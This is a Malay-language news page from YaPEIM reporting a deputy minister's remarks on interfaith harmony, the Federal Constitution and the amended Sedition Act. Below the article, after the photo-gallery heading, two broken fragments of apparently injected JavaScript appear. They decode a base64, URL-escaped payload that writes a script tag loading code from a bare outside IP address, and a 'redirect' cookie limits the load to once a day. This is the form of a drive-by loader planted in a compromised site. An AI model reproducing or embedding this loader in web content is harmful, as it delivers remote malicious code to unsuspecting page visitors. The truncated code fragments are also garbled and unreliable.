YaPEIM » Dialog Silang Agama

Terkini

Dialog Silang Agama

Kedudukan agama Islam sebagai agama Persekutuan seperti termaktub dalam Perlembagaan perlu dihormati tanpa mengabaikan hak dan tanggungjawab agama lain.

KUALA LUMPUR 7 Nov. – Kestabilan dan keamanan yang dikecapi rakyat di negara ini tidak terjamin sekira­nya Perlembagaan Persekutuan tidak dipertahan serta diperkukuhkan.

Timbalan Menteri di Jabatan Perdana Menteri, Senator Datuk Dr. Asyraf Wajdi Dusuki berkata, Perlembagaan perlu difahami dengan jelas oleh setiap masyarakat pelbagai kaum dan agama kerana perkara tersebut merupakan struktur asas kepada sesebuah negara.

Sebagai contoh, katanya, kedudukan agama Islam sebagai agama Persekutuan seperti yang termaktub dalam Perlembagaan perlu terus dihormati tanpa mengabaikan hak dan tanggungjawab agama lain.

“Perlembagaan ini perlu kita pertahankan sebab itu Malaysia walaupun agama Islam merupakan agama negara tetapi tidak pernah kita menafikan hak agama lain.

“Malah, kita satu-satunya negara yang meraikan semua perayaan kaum masing-masing serta tidak pernah sekali pun berlaku seperti negara-negara luar yang mempunyai sentimen untuk meruntuhkan negara dan meluahkan rasa tidak puas hati walaupun Islam merupakan agama negara,” katanya.

Beliau berkata demikian ketika ditemui pemberita selepas merasmikan program Dialog Silang Agama Perpaduan Dalam Masyarakat Majmuk Dari Perspektif Agama-Agama anjuran Yayasan Pembangunan Ekonomi Islam Malaysia (Yapeim) di sini hari ini.

Yang turut hadir, Ketua Pengarah YaPEIM, Datuk Abibullah Samsudin.

Sementara itu, Asyraf Wajdi turut mengingatkan masyarakat agar tidak memandang remeh pindaan Akta Hasutan yang dibuat kerajaan kerana undang-undang tersebut merupakan satu instrumen penting bagi menjaga keharmonian agama di negara ini.

Beliau berkata, Akta Hasutan yang ditambah baik itu tidak akan membenarkan mana-mana pihak menyentuh bukan sahaja agama Islam tetapi juga sentimen agama-agama lain di negara ini.

“Jika sebelum ini, agama Islam sahaja disebut tetapi kini jika agama Hindu, Buddha atau Kristian diganggu, maka sesiapa juga boleh dikenakan tindakan.

“Walaupun undang-undang itu hanya merupakan satu instrumen atau alat untuk menjaga keharmonian tetapi perkara itu tidak perlu diremehkan,” jelasnya. -utusan-

Galeri Gambar

([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”

(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”

Top

Comments are closed.

Top